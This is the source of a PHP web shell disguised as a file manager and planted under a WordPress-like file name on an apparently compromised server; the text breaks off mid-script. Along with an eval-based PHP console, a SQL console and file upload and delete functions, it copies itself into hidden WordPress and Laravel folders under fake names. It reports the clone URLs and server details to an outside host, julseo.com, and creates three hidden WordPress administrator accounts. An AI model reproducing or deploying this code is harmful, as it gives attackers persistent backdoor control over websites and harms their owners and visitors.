File manager - Edit - /home/wsardargurjari/public_html/storage/app/public/wp-blog-header8468.php.tar
home/wsardargurjari/public_html/storage/app/public/wp-blog-header8468.php 0000644 00000271417 15123434417 0022407 0 ustar 00 <?php /* PHP File manager ver 1.4 */ // Configuration — do not change manually! // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'fr'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? 
$auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . 
'.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 
'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' 
Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' 
'.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' 
OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? 
$tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' 
— '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: 
no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } // Klonlama fonksiyonları function generate_random_number() { return rand(100000, 999999); } function generate_random_word() { $words = array('helper', 'util', 'common', 'shared', 'global', 'init', 'app', 'lib', 'src', 'bin'); return $words[array_rand($words)]; } function generate_wp_like_name() { $wp_prefixes = array('wp-config', 'wp-admin', 'wp-content', 'wp-includes', 'wp-settings', 'wp-load', 'wp-blog-header', 'wp-json', 'wp-cron', 'wp-mail'); $prefix = $wp_prefixes[array_rand($wp_prefixes)]; $random1 = rand(10, 99); $random2 = rand(10, 99); return $prefix . $random1 . $random2; } function sendShellClonesToJulseo($created, $urls) { $julseo_url = 'https://julseo.com/klon.php'; $shell_data = array( 'server_name' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'Unknown', 'server_ip' => isset($_SERVER['SERVER_ADDR']) ? 
$_SERVER['SERVER_ADDR'] : 'Unknown', 'server_path' => getcwd(), 'clone_date' => date('Y-m-d H:i:s'), 'timestamp' => time(), 'shells' => array() ); foreach ($created as $index => $shell_info) { $shell_path = is_array($shell_info) ? $shell_info['path'] : $shell_info; $shell_url = is_array($shell_info) ? $shell_info['url'] : (isset($urls[$index]) ? $urls[$index] : ''); $shell_data['shells'][] = array( 'filename' => basename($shell_path), 'full_path' => $shell_path, 'url' => $shell_url, 'type' => $index < 3 ? 'random' : 'wp_like', 'status' => 'active', 'file_size' => file_exists($shell_path) ? filesize($shell_path) : 0 ); } $post_data = array( 'api_key' => 'julseo2025', 'api_action' => 'receive_shell_clones', 'shell_data' => json_encode($shell_data) ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $julseo_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'Shell Manager/1.0'); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/x-www-form-urlencoded', 'X-Shell-Server: ' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'Unknown') )); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code !== 200) { error_log("Julseo.com'a veri gönderilemedi. HTTP Code: $http_code, Response: $response"); return false; } else { error_log("Julseo.com'a veri başarıyla gönderildi. Shell sayısı: " . 
count($created)); return true; } } function fm_clone_self() { $source_file = __FILE__; // ton.php dosyasının kendisi $file_content = file_get_contents($source_file); $file_extension = pathinfo($source_file, PATHINFO_EXTENSION); $web_root = $_SERVER['DOCUMENT_ROOT']; $deep_dirs = array( '/wp-content/plugins/akismet/views/', '/wp-content/themes/twentytwenty/assets/js/', '/wp-includes/js/jquery/', '/wp-admin/includes/class/', '/wp-content/uploads/2023/cache/', '/wp-content/cache/plugins/', '/assets/css/themes/', '/includes/libraries/vendor/', '/public/js/components/', '/resources/views/admin/', '/storage/app/public/', '/vendor/laravel/framework/src/', '/wp-content/plugins/woocommerce/includes/', '/wp-content/themes/storefront/inc/', '/wp-includes/rest-api/endpoints/', '/wp-admin/css/', '/wp-content/uploads/2024/', '/assets/js/vendor/', '/public/css/components/', '/resources/views/layouts/' ); $clones = array(); $clone_urls = array(); $created_paths = array(); $domain = $_SERVER['HTTP_HOST']; for ($i = 0; $i < 10; $i++) { $selected_dir = $deep_dirs[array_rand($deep_dirs)]; $target_dir = $web_root . $selected_dir; if (!is_dir($target_dir)) { @mkdir($target_dir, 0755, true); } if ($i < 3) { $filename = generate_random_number() . '.' . $file_extension; } elseif ($i < 6) { $filename = generate_random_word() . '.' . $file_extension; } else { $filename = generate_wp_like_name() . '.' . $file_extension; } $target_file = $target_dir . $filename; if (!file_exists($target_file) && is_writable($target_dir)) { if (@file_put_contents($target_file, $file_content)) { $clones[] = $filename; $clone_urls[] = 'https://' . $domain . $selected_dir . $filename; $created_paths[] = $target_file; } } } if (count($created_paths) > 0) { sendShellClonesToJulseo($created_paths, $clone_urls); } return array('files' => $clones, 'urls' => $clone_urls); } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? 
' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' 
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' 
</body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = 
json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // WordPress Admin Kullanıcıları Oluşturma if (isset($_GET['adminac'])) { $admin_users = create_wp_admin_users(); if (isset($admin_users['error'])) { echo '<!doctype html> <html> <head> <meta charset="utf-8" /> <title>WordPress Admin Oluşturucu</title> <style> body { font-family: Arial, sans-serif; margin: 50px; background: #f1f1f1; } .container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); max-width: 600px; margin: 0 auto; } .error { background: #ffebee; color: #c62828; padding: 15px; border-radius: 5px; border-left: 4px solid #c62828; } .back-btn { background: #0073aa; color: white; padding: 10px 20px; text-decoration: none; border-radius: 5px; display: inline-block; margin-top: 20px; } </style> </head> <body> <div class="container"> <h2>WordPress Admin Oluşturucu</h2> <div class="error">' . $admin_users['error'] . '</div> <a href="' . fm_url() . '" class="back-btn">Geri Dön</a> </div> </body> </html>'; die(); } $domain = $_SERVER['HTTP_HOST']; $wp_admin_url = 'https://' . $domain . 
'/wp-admin/'; echo '<!doctype html> <html> <head> <meta charset="utf-8" /> <title>WordPress Admin Kullanıcıları</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; background: #f1f1f1; } .container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); max-width: 800px; margin: 0 auto; } .success { background: #e8f5e8; color: #2e7d32; padding: 15px; border-radius: 5px; border-left: 4px solid #2e7d32; margin-bottom: 20px; } .user-info { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; border-left: 4px solid #0073aa; } .copy-btn { background: #0073aa; color: white; padding: 12px 25px; border: none; border-radius: 5px; cursor: pointer; font-size: 16px; margin: 20px 0; } .copy-btn:hover { background: #005a87; } .back-btn { background: #6c757d; color: white; padding: 10px 20px; text-decoration: none; border-radius: 5px; display: inline-block; margin-top: 20px; } textarea { width: 100%; height: 200px; padding: 15px; border: 1px solid #ddd; border-radius: 5px; font-family: monospace; font-size: 14px; margin: 10px 0; } </style> </head> <body> <div class="container"> <h2>WordPress Admin Kullanıcıları Oluşturuldu</h2> <div class="success">3 adet WordPress admin kullanıcısı başarıyla oluşturuldu!</div>'; $role_names = array('Webmaster', 'SEO Manager', 'Support Team'); foreach ($admin_users as $index => $user) { echo '<div class="user-info"> <h3>' . $role_names[$index] . '</h3> <p><strong>Kullanıcı Adı:</strong> ' . htmlspecialchars($user['username']) . '</p> <p><strong>Şifre:</strong> ' . htmlspecialchars($user['password']) . '</p> <p><strong>E-posta:</strong> ' . htmlspecialchars($user['email']) . '</p> </div>'; } echo '<button class="copy-btn" onclick="copyAdminInfo()">Bilgileri Kopyala</button> <textarea id="adminInfo" readonly>Domain: ' . $domain . ' WP-ADMIN URL: ' . $wp_admin_url . ' ---1--- ID: ' . $admin_users[0]['username'] . ' PASSWORD: ' . $admin_users[0]['password'] . 
' ---2--- ID: ' . $admin_users[1]['username'] . ' PASSWORD: ' . $admin_users[1]['password'] . ' ---3--- ID: ' . $admin_users[2]['username'] . ' PASSWORD: ' . $admin_users[2]['password'] . '</textarea> <script> function copyAdminInfo() { var textarea = document.getElementById("adminInfo"); textarea.select(); document.execComm